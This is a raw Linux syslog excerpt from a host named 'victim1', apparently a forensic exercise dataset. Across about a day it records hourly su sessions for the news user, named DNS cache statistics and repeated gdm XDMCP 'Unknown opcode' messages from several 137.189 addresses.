Jan 13 10:01:00 victim1 PAM_pwdb[20867]: (su) session opened for user news by (uid=0)
Jan 13 10:01:03 victim1 PAM_pwdb[20867]: (su) session closed for user news
Jan 13 10:16:24 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 13 10:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 13 10:21:58 victim1 named[385]: USAGE 947730118 944119308 CPU=0.97u/3.13s CHILDCPU=0u/0s
Jan 13 10:21:58 victim1 named[385]: NSTATS 947730118 944119308
Jan 13 10:21:58 victim1 named[385]: XSTATS 947730118 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 13 10:27:58 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 13 11:01:00 victim1 PAM_pwdb[20928]: (su) session opened for user news by (uid=0)
Jan 13 11:01:01 victim1 PAM_pwdb[20928]: (su) session closed for user news
Jan 13 11:16:24 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 13 11:19:26 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 13 11:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 13 11:21:58 victim1 named[385]: USAGE 947733718 944119308 CPU=0.97u/3.13s CHILDCPU=0u/0s
Jan 13 11:21:58 victim1 named[385]: NSTATS 947733718 944119308
Jan 13 11:21:58 victim1 named[385]: XSTATS 947733718 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 13 12:01:01 victim1 PAM_pwdb[20987]: (su) session opened for user news by (uid=0)
Jan 13 12:01:01 victim1 PAM_pwdb[20987]: (su) session closed for user news
Jan 13 12:16:24 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 13 12:19:09 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 13 12:19:31 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 13 12:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 13 12:21:59 victim1 named[385]: USAGE 947737319 944119308 CPU=0.97u/3.13s CHILDCPU=0u/0s
Jan 13 12:21:59 victim1 named[385]: NSTATS 947737319 944119308
Jan 13 12:21:59 victim1 named[385]: XSTATS 947737319 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 13 12:24:14 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 13 13:01:00 victim1 PAM_pwdb[21046]: (su) session opened for user news by (uid=0)
Jan 13 13:01:01 victim1 PAM_pwdb[21046]: (su) session closed for user news
Jan 13 13:19:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 13 13:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 13 13:21:59 victim1 named[385]: USAGE 947740919 944119308 CPU=0.97u/3.13s CHILDCPU=0u/0s
Jan 13 13:21:59 victim1 named[385]: NSTATS 947740919 944119308
Jan 13 13:21:59 victim1 named[385]: XSTATS 947740919 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 13 13:24:14 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 13 13:53:54 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 13 14:01:00 victim1 PAM_pwdb[21105]: (su) session opened for user news by (uid=0)
Jan 13 14:01:01 victim1 PAM_pwdb[21105]: (su) session closed for user news
Jan 13 14:04:09 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 13 14:04:09 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 13 14:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 13 14:21:59 victim1 named[385]: USAGE 947744519 944119308 CPU=0.97u/3.13s CHILDCPU=0u/0s
Jan 13 14:21:59 victim1 named[385]: NSTATS 947744519 944119308
Jan 13 14:21:59 victim1 named[385]: XSTATS 947744519 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 13 14:51:14 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.89
Jan 13 14:53:53 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 13 15:01:01 victim1 PAM_pwdb[21164]: (su) session opened for user news by (uid=0)
Jan 13 15:01:03 victim1 PAM_pwdb[21164]: (su) session closed for user news
Jan 13 15:04:10 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 13 15:05:08 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.243
Jan 13 15:05:08 victim1 last message repeated 2 times
Jan 13 15:09:37 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.98.33
Jan 13 15:09:37 victim1 last message repeated 3 times
Jan 13 15:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 13 15:21:59 victim1 named[385]: USAGE 947748119 944119308 CPU=0.97u/3.13s CHILDCPU=0u/0s
Jan 13 15:21:59 victim1 named[385]: NSTATS 947748119 944119308
Jan 13 15:21:59 victim1 named[385]: XSTATS 947748119 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 13 15:53:52 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 13 16:01:00 victim1 PAM_pwdb[21223]: (su) session opened for user news by (uid=0)
Jan 13 16:01:02 victim1 PAM_pwdb[21223]: (su) session closed for user news
Jan 13 16:04:09 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 13 16:05:07 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.243
Jan 13 16:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 13 16:21:59 victim1 named[385]: USAGE 947751719 944119308 CPU=0.97u/3.13s CHILDCPU=0u/0s
Jan 13 16:21:59 victim1 named[385]: NSTATS 947751719 944119308
Jan 13 16:21:59 victim1 named[385]: XSTATS 947751719 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 13 16:22:17 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 13 16:29:17 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 13 17:01:01 victim1 PAM_pwdb[21282]: (su) session opened for user news by (uid=0)
Jan 13 17:01:01 victim1 PAM_pwdb[21282]: (su) session closed for user news
Jan 13 17:04:10 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 13 17:05:06 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.243
Jan 13 17:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 13 17:21:59 victim1 named[385]: USAGE 947755319 944119308 CPU=0.97u/3.13s CHILDCPU=0u/0s
Jan 13 17:21:59 victim1 named[385]: NSTATS 947755319 944119308
Jan 13 17:21:59 victim1 named[385]: XSTATS 947755319 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 13 17:41:11 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 13 17:45:57 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 13 18:01:00 victim1 PAM_pwdb[21341]: (su) session opened for user news by (uid=0)
Jan 13 18:01:03 victim1 PAM_pwdb[21341]: (su) session closed for user news
Jan 13 18:05:06 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.243
Jan 13 18:17:06 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 13 18:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 13 18:21:59 victim1 named[385]: USAGE 947758919 944119308 CPU=0.98u/3.18s CHILDCPU=0u/0s
Jan 13 18:21:59 victim1 named[385]: NSTATS 947758919 944119308
Jan 13 18:21:59 victim1 named[385]: XSTATS 947758919 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 13 19:01:00 victim1 PAM_pwdb[21400]: (su) session opened for user news by (uid=0)
Jan 13 19:01:01 victim1 PAM_pwdb[21400]: (su) session closed for user news
Jan 13 19:17:06 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 13 19:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 13 19:21:59 victim1 named[385]: USAGE 947762519 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 13 19:21:59 victim1 named[385]: NSTATS 947762519 944119308
Jan 13 19:21:59 victim1 named[385]: XSTATS 947762519 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 13 20:01:01 victim1 PAM_pwdb[21459]: (su) session opened for user news by (uid=0)
Jan 13 20:01:03 victim1 PAM_pwdb[21459]: (su) session closed for user news
Jan 13 20:17:06 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 13 20:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 13 20:21:59 victim1 named[385]: USAGE 947766119 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 13 20:21:59 victim1 named[385]: NSTATS 947766119 944119308
Jan 13 20:21:59 victim1 named[385]: XSTATS 947766119 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 13 21:01:00 victim1 PAM_pwdb[21518]: (su) session opened for user news by (uid=0)
Jan 13 21:01:01 victim1 PAM_pwdb[21518]: (su) session closed for user news
Jan 13 21:17:06 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 13 21:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 13 21:21:59 victim1 named[385]: USAGE 947769719 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 13 21:21:59 victim1 named[385]: NSTATS 947769719 944119308
Jan 13 21:21:59 victim1 named[385]: XSTATS 947769719 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 13 22:01:00 victim1 PAM_pwdb[21577]: (su) session opened for user news by (uid=0)
Jan 13 22:01:01 victim1 PAM_pwdb[21577]: (su) session closed for user news
Jan 13 22:17:05 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 13 22:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 13 22:21:59 victim1 named[385]: USAGE 947773319 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 13 22:21:59 victim1 named[385]: NSTATS 947773319 944119308
Jan 13 22:21:59 victim1 named[385]: XSTATS 947773319 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 13 23:01:00 victim1 PAM_pwdb[21636]: (su) session opened for user news by (uid=0)
Jan 13 23:01:01 victim1 PAM_pwdb[21636]: (su) session closed for user news
Jan 13 23:17:05 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 13 23:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 13 23:21:59 victim1 named[385]: USAGE 947776919 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 13 23:21:59 victim1 named[385]: NSTATS 947776919 944119308
Jan 13 23:21:59 victim1 named[385]: XSTATS 947776919 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 14 00:01:01 victim1 PAM_pwdb[21695]: (su) session opened for user news by (uid=0)
Jan 14 00:01:02 victim1 PAM_pwdb[21695]: (su) session closed for user news
Jan 14 00:17:05 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 14 00:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 14 00:21:59 victim1 named[385]: USAGE 947780519 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 14 00:21:59 victim1 named[385]: NSTATS 947780519 944119308
Jan 14 00:21:59 victim1 named[385]: XSTATS 947780519 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 14 01:01:00 victim1 PAM_pwdb[21754]: (su) session opened for user news by (uid=0)
Jan 14 01:01:02 victim1 PAM_pwdb[21754]: (su) session closed for user news
Jan 14 01:17:05 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 14 01:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 14 01:21:59 victim1 named[385]: USAGE 947784119 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 14 01:21:59 victim1 named[385]: NSTATS 947784119 944119308
Jan 14 01:21:59 victim1 named[385]: XSTATS 947784119 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 14 02:01:01 victim1 PAM_pwdb[21813]: (su) session opened for user news by (uid=0)
Jan 14 02:01:02 victim1 PAM_pwdb[21813]: (su) session closed for user news
Jan 14 02:17:05 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 14 02:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 14 02:21:59 victim1 named[385]: USAGE 947787719 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 14 02:21:59 victim1 named[385]: NSTATS 947787719 944119308
Jan 14 02:21:59 victim1 named[385]: XSTATS 947787719 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 14 03:01:00 victim1 PAM_pwdb[21872]: (su) session opened for user news by (uid=0)
Jan 14 03:01:01 victim1 PAM_pwdb[21872]: (su) session closed for user news
Jan 14 03:17:04 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 14 03:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 14 03:21:59 victim1 named[385]: USAGE 947791319 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 14 03:21:59 victim1 named[385]: NSTATS 947791319 944119308
Jan 14 03:21:59 victim1 named[385]: XSTATS 947791319 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 14 04:01:00 victim1 PAM_pwdb[21931]: (su) session opened for user news by (uid=0)
Jan 14 04:01:01 victim1 PAM_pwdb[21931]: (su) session closed for user news
Jan 14 04:02:00 victim1 PAM_pwdb[21971]: (su) session opened for user news by (uid=0)
Jan 14 04:02:55 victim1 PAM_pwdb[21971]: (su) session closed for user news
Jan 14 04:06:43 victim1 PAM_pwdb[22444]: (su) session opened for user news by (uid=0)
Jan 14 04:06:44 victim1 PAM_pwdb[22444]: (su) session closed for user news
Jan 14 04:17:04 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 14 04:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 14 04:21:59 victim1 named[385]: USAGE 947794919 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 14 04:21:59 victim1 named[385]: NSTATS 947794919 944119308
Jan 14 04:21:59 victim1 named[385]: XSTATS 947794919 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 14 05:01:00 victim1 PAM_pwdb[22548]: (su) session opened for user news by (uid=0)
Jan 14 05:01:02 victim1 PAM_pwdb[22548]: (su) session closed for user news
Jan 14 05:17:04 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 14 05:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 14 05:21:59 victim1 named[385]: USAGE 947798519 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 14 05:21:59 victim1 named[385]: NSTATS 947798519 944119308
Jan 14 05:21:59 victim1 named[385]: XSTATS 947798519 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 14 06:01:00 victim1 PAM_pwdb[22607]: (su) session opened for user news by (uid=0)
Jan 14 06:01:01 victim1 PAM_pwdb[22607]: (su) session closed for user news
Jan 14 06:17:04 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 14 06:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 14 06:21:59 victim1 named[385]: USAGE 947802119 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 14 06:21:59 victim1 named[385]: NSTATS 947802119 944119308
Jan 14 06:21:59 victim1 named[385]: XSTATS 947802119 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 14 07:01:00 victim1 PAM_pwdb[22666]: (su) session opened for user news by (uid=0)
Jan 14 07:01:01 victim1 PAM_pwdb[22666]: (su) session closed for user news
Jan 14 07:17:04 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 14 07:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 14 07:21:59 victim1 named[385]: USAGE 947805719 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 14 07:21:59 victim1 named[385]: NSTATS 947805719 944119308
Jan 14 07:21:59 victim1 named[385]: XSTATS 947805719 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 14 08:01:00 victim1 PAM_pwdb[22725]: (su) session opened for user news by (uid=0)
Jan 14 08:01:01 victim1 PAM_pwdb[22725]: (su) session closed for user news
Jan 14 08:17:03 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 14 08:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 14 08:21:59 victim1 named[385]: USAGE 947809319 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 14 08:21:59 victim1 named[385]: NSTATS 947809319 944119308
Jan 14 08:21:59 victim1 named[385]: XSTATS 947809319 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 14 09:01:00 victim1 PAM_pwdb[22784]: (su) session opened for user news by (uid=0)
Jan 14 09:01:01 victim1 PAM_pwdb[22784]: (su) session closed for user news
Jan 14 09:17:03 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 14 09:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 14 09:21:59 victim1 named[385]: USAGE 947812919 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 14 09:21:59 victim1 named[385]: NSTATS 947812919 944119308
Jan 14 09:21:59 victim1 named[385]: XSTATS 947812919 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 14 09:43:30 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 14 09:43:31 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 14 10:01:00 victim1 PAM_pwdb[22843]: (su) session opened for user news by (uid=0)
Jan 14 10:01:03 victim1 PAM_pwdb[22843]: (su) session closed for user news
Jan 14 10:17:03 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 14 10:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 14 10:21:59 victim1 named[385]: USAGE 947816519 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 14 10:21:59 victim1 named[385]: NSTATS 947816519 944119308
Jan 14 10:21:59 victim1 named[385]: XSTATS 947816519 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 14 10:22:01 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 14 10:22:01 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 14 11:01:01 victim1 PAM_pwdb[22904]: (su) session opened for user news by (uid=0)
Jan 14 11:01:02 victim1 PAM_pwdb[22904]: (su) session closed for user news
Jan 14 11:17:03 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 14 11:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 14 11:21:59 victim1 named[385]: USAGE 947820119 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 14 11:21:59 victim1 named[385]: NSTATS 947820119 944119308
Jan 14 11:21:59 victim1 named[385]: XSTATS 947820119 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 14 11:22:00 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 14 12:01:00 victim1 PAM_pwdb[22963]: (su) session opened for user news by (uid=0)
Jan 14 12:01:01 victim1 PAM_pwdb[22963]: (su) session closed for user news
Jan 14 12:06:17 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.98.33
Jan 14 12:06:17 victim1 last message repeated 2 times
Jan 14 12:17:03 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 14 12:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 14 12:21:59 victim1 named[385]: USAGE 947823719 944119308 CPU=0.99u/3.19s CHILDCPU=0u/0s
Jan 14 12:21:59 victim1 named[385]: NSTATS 947823719 944119308
Jan 14 12:21:59 victim1 named[385]: XSTATS 947823719 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 14 12:21:59 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 14 12:57:59 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.90
